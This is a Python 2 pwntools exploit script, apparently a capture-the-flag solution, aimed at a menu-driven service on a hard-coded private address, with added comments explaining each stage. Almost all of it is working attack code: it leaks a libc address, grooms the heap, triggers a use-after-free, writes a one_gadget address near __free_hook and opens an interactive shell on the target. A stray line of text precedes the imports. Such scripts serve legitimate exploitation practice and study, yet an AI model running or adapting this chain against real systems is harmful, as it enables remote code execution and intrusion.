kikikiki
import sys

from pwn import *
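# Target selection.  Defaults are exactly what the original script hard-coded
# (10.10.134.127:30004; 192.168.0.12:1234 was a commented-out local test box),
# so running with no arguments behaves as before.  Override on the command
# line with `python exploit.py HOST PORT` instead of editing the file.
HOST = sys.argv[1] if len(sys.argv) > 1 else '10.10.134.127'
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 30004
# Module-level connection; every helper below talks to the service through `s`.
s = remote(HOST, PORT)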
def add(name):
    """Menu option 1: create an entry called *name*.

    Waits for the '>>>' prompt, picks option 1, then answers the 'name'
    prompt with *name* exactly as given (raw send, no newline appended).
    """
    s.sendlineafter('>>>', '1')
    s.sendafter('name', name)
def select(index):
    """Menu option 2: select the entry at *index* (any value str() accepts)."""
    choice = str(index)
    s.sendlineafter('>>>', '2')
    s.sendlineafter('>>>', choice)
def delete():
    """Menu option 3, then answer the 'action' prompt with -1.

    Named "delete" by the author; the sub-action code -1 is what the
    service interprets, this helper only drives the prompts.
    """
    s.sendlineafter('>>>', '3')
    s.sendlineafter('action', '-1')
def show():
    """Send menu option 3 at the next '>>>' prompt.

    Does not read the response; the caller parses whatever is printed.
    """
    s.sendlineafter('>>>', '3')
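def add_unit(name):
    """Alias of add(): menu option 1 with *name* as the entry name.

    The original body was a verbatim copy of add(); delegating keeps the two
    in sync if the menu or prompt strings ever change.
    """
    add(name)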
def uaf():
    """Menu option 3 -> sub-action 21, then answer three 'action :' prompts with 1.

    The author named this "uaf"; what the sequence does inside the service
    is not visible here.  The original also carried a commented-out fourth
    answer ('0') that was never sent, so it is omitted.
    """
    s.sendlineafter('>>>', '3')
    s.sendlineafter('action :', '21')
    for _ in range(3):
        s.sendlineafter('action :', '1')
def out():
    """Send menu option 5 at the next '>>>' prompt."""
    s.sendlineafter('>>>', '5')
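def delete_unit(index):
    """Alias of select(): menu option 2 followed by *index*.

    The original body duplicated select() line for line; delegating removes
    the copy so both helpers keep driving the same prompts.
    """
    select(index)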
def poison_null(dat):
    """Menu 3 -> sub-action 21 -> 0, send *dat* at the 'hero!' prompt, then continue.

    Not called anywhere in this script.  NOTE(review): the gist lost its
    indentation, so everything down to the 'show me the money!' line is
    assumed to belong to this function; confirm against the original before
    reusing it.  The name suggests a NUL-byte (off-by-one) poisoning
    primitive, but nothing here shows what the service does with *dat*.
    """
    s.recvuntil('>>>')
    s.sendline('3')
    s.recvuntil('action :')
    s.sendline('21')
    s.recvuntil('action :')
    s.sendline('0')
    s.recvuntil('hero!')
    s.send(dat)  # raw send: exactly the bytes of *dat*, no newline appended
    raw_input()  # Python 2; blocks until Enter (presumably a debugger-attach pause)
    s.recvuntil('>>>')
    s.send("AAAA")
    # show me the money
    s.recvuntil('>>>')
    s.sendline('4444')
    s.recvuntil('>>>')
    s.sendline('show me the money!')
# ---------------------------------------------------------------------------
# Exploit driver.  Python 2 (raw_input, str-based pwntools API).  Every
# recvuntil() below has no timeout, so a prompt that never appears hangs
# the script instead of failing; the hard-coded offsets further down are
# specific to the target's libc build and must be re-derived for any other.
# ---------------------------------------------------------------------------

# Stage 1: obtain a libc address.
add("AAAA")
add("AAAA")
select(0)
delete()
add('A')  # single byte 'A' (0x41), sent without a newline
show()
# Take the 6 bytes printed just before '[ 1]' and zero-extend to a u64.
# 0x3c4b41: distance from the leaked value to the libc base on the target's
# libc.  Its low byte is 0x41 == 'A', consistent with the one-byte write above
# clobbering the low byte of the leaked pointer — TODO confirm against the
# actual libc (the numbers look like a glibc 2.23 layout, but that is inferred).
libc = u64(s.recvuntil('[ 1]')[-7-6:-7]+'\x00\x00') - 0x3c4b41
log.info("LIBC : 0x%x"%libc)

# Stage 2: heap grooming (add_unit == add, so three more 'ABCD' entries).
select(0)
add_unit('ABCD')
add_unit('ABCD')
add_unit('ABCD')
out()
raw_input()  # manual pause, presumably to attach a debugger before the UAF step
add('BBBB')
select(0)
uaf()
out()
select(2)
delete()
add('BBBB')
select(0)

# Stage 3: menu 3 -> sub-action 21, then sub-action 16 three times.  The first
# two writes are 16 filler bytes each; the third appends a libc pointer.
s.recvuntil('>>>')
s.sendline('3')
s.recvuntil('action :')
s.sendline('21')
s.recvuntil('action :')
s.sendline('16')
s.recvuntil('hero')
s.sendline('A'*0x10)
s.recvuntil('action :')
s.sendline('16')
s.recvuntil('hero')
s.sendline('A'*0x10)
s.recvuntil('action :')
s.sendline('16')
s.recvuntil('hero')
# libc+0x3c67a8 is, on a glibc 2.23 build, the address of __free_hook, and
# -0x50 would aim the pointer 0x50 bytes before it — NOTE(review): inferred
# from the constants only; verify with `readelf -s libc.so.6 | grep free_hook`.
s.send("A"*0x10+p64(libc+0x3c67a8-0x50))
out()
select(2)

# Stage 4: same menu path, one more 16-byte write that delivers the target
# address.  0x4526a matches a widely published glibc 2.23 one_gadget offset;
# confirm with the one_gadget tool against the target libc before relying on it.
s.recvuntil('>>>')
s.sendline('3')
s.recvuntil('action :')
s.sendline('21')
s.recvuntil('action :')
s.sendline('16')
s.recvuntil('hero')
s.send(p64(libc+0x4526a))
s.interactive()  # hand the connection to the user (shell expected if the chain worked)